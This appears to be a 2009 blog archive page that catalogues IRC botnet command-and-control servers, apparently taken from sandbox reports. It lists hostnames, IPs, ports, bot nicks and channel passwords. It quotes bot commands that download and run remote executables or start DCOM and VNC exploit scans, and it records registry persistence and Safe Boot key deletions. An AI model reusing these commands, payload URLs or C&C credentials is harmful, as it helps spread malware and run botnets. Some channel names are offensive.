Month: November 2009

tx.mostafaaljaafari.net

67.43.232.36:8080Nick: FpNYgjKTVUsername: ngyccnJoined Channel: #rstn2Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s” other chanels Now talking in ##xddcTopic On: [ ##xddc ] [=t0Y0F21DYX4e6UWiqOP9ZY0vX4MOFnQpiS67nAcB1uLbI7sg33T9PIBDhDk/qm5 ]Topic By: [ m1244 ]Modes On: [ ##xddc ] [ +smntSMCu ] Now talking in #xddc1Topic On: [ #xddc1 ] [13 * download http://idfc.info/bnew.exe -e -f -s ]Topic By:

dong.nagitiriheiwu.net

72.10.169.26:2293Nick: akjHdYdPUsername: tpepiyJoined Channel: #siwaChannel Topic for Channel #siwa: “=XRlSYWHDxodKoKTdT7BxKpedXm7GERdOTvU41sULBVo0tVz3vs9al15JIViw”

ghostnet.ghostmarket.net

Remote Host Port Number58.30.17.229 8080 NICK {NEW-USA-XP-SXYOQB}USER USA “” “lol” :USAJOIN #!RapePONG :ghostnet.ghostmarket.net Other details * The following port was open in the system: Port Protocol Process1052 TCP File.exe (%UserProfile%File.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Microsoft Drive Guard32 = “%UserProfile%File.exe” so that File.exe runs every time Windows starts

74.81.64.25(email bot)

74.81.64.25 (2345)#info [21:41] [BRA|00|D|33418]: [IM]: Thread Activated: Sending Message With Email.

drego85.dyndns.org/drego85.ns0.it/drego85.no-ip.net

Host Name IP Addressdell-d3e62f7e26 10.1.12.2drego85.dyndns.org 67.220.65.39 * C&C Server: 67.220.65.39:6667 * Server Password: * Username: XP-2174 * Nickname: [00|DEU|707227] * Channel: #imbot (Password: config) * Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:startme32.exe 1

net.anddos.co.uk(anddos dci bot lol)

* Requested Host: net.anddos.co.uk* Resulting Address: 94.23.153.223 * IRC Data o User Name: zgtlat o Host Name: “” o Server Name: o Real Name: zgtlat o Password: dickybob o Nick Name: ncrrpk o Non RFC Conform: 1 + Channel # Name: #ohai3 # Password: trb123trb + Notice Message Deleted # Value: :irc.goonet.net NOTICE AUTH :***

sip4.voipkosovasite.com

DNS LookupHost Name IP Address0 127.0.0.1shitit.net shitit.net 75.126.252.200UDP ConnectionsRemote IP Address: 127.0.0.1 Port: 1045Send Datagram: 53 packet(s) of size 1Recv Datagram: 53 packet(s) of size 1Download URLshttp://75.126.252.200/fly3.jpg (shitit.net)Outgoing connection to remote server: shitit.net TCP port 80DNS LookupHost Name IP Addressdell-d3e62f7e26 10.1.10.2sip4.voipkosovasite.com 82.114.87.46 * C&C Server: 82.114.87.46:1868 * Server Password: * Username: XP-9971 * Nickname: [00|DEU|994663]

213.239.201.80(ruski bots)

Remote Host Port Number213.239.201.80 8000213.239.201.80 80 * The data identified by the following URL was then requested from the remote web server: o http://nero872.cn/a/ Registry Modifications * The following Registry Keys were created: o HKEY_CURRENT_USERSoftwareMinisoft o HKEY_CURRENT_USERSoftwareVideohost o HKEY_CURRENT_USERSoftwareXML * The following Registry Keys were deleted: o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimal o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalAppMgmt o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalBase o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalBoot Bus

Buchananas21.Coupe.Mx [riesgo.]

Remote Host Port Number66.90.110.138 7070 MODE [CPF|USA|00|P|20484] -ixJOIN #FUD f1f4fudPRIVMSG #FUD :[IM]: Thread Activated: Sending Message.PONG Buchananas21.Coupe.MxNICK [CPF|USA|00|P|20484]USER XP-9366 * 0 :COMPUTERNAME PASS couperlz Other details * The following port was open in the system: Port Protocol Process1053 TCP baeksyesrn.exe (%Windir%baeksyesrn.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Sec

olivares2006.noip.es

85.214.114.224:6668 Nick: AUT[XP]1627252Username: phuznpvJoined Channel: ##tomillarChannel Topic for Channel ##tomillar: “.asc vnc 75 0 0 -r -b “Private Message to Channel ##tomillar: “[REALMBOT] Random Exploitation started on 192.168.x.x:5900 waiting 5 seconds for 0 minutes using 75 threads.”